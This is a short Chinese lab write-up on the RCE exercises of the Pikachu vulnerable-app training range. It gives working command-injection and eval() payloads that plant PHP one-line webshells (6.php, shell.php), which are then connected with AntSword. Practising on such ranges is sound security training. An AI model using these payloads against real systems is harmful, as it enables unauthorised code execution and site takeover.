Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
小鸡食米1 小时前
Nginx基础
运维·服务器·nginx
~黄夫人~8 小时前
Linux 权限管理:用户组 + 特殊权限 + ACL 解析
linux·运维·计算机·学习笔记·权限管理
2501_907136828 小时前
手搓仓库管理系统Senbar-1.0.4(附带财务管理板块)
运维·服务器·软件需求
枷锁—sha8 小时前
【pwn系列】Pwndbg 汇编调试实操教程
网络·汇编·笔记·安全·网络安全
badwomen__8 小时前
MOV 指令的数据流向
服务器·性能优化
Bruce_Liuxiaowei9 小时前
Windows系统安全加固——从基础到进阶的实战配置
windows·安全·系统安全
盟接之桥9 小时前
盟接之桥EDI软件:API数据采集模块深度解析,打造企业数据协同新引擎
java·运维·服务器·网络·数据库·人工智能·制造
2501_9071368210 小时前
离线工具箱 内含53个小工具
linux·服务器·网络
时空潮汐10 小时前
神卓N600 NAS身份核验功能深度解析
linux·运维·网络·神卓nas·神卓n600 pro·家庭轻nas
A1b2rt10 小时前
CISCN-2025-FINAL-DarkHeap
安全·pwn·wp·ciscn
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot04HTML 早已不是标签了,它现在是系统级接口:这 9 个 API 直接干翻常用 JS 库05如何解决 OpenClaw “Pairing required” 报错:两种官方解决方案详解06全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)07【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆08MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法09openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南10配置 OpenClaw 使用 Ollama 本地模型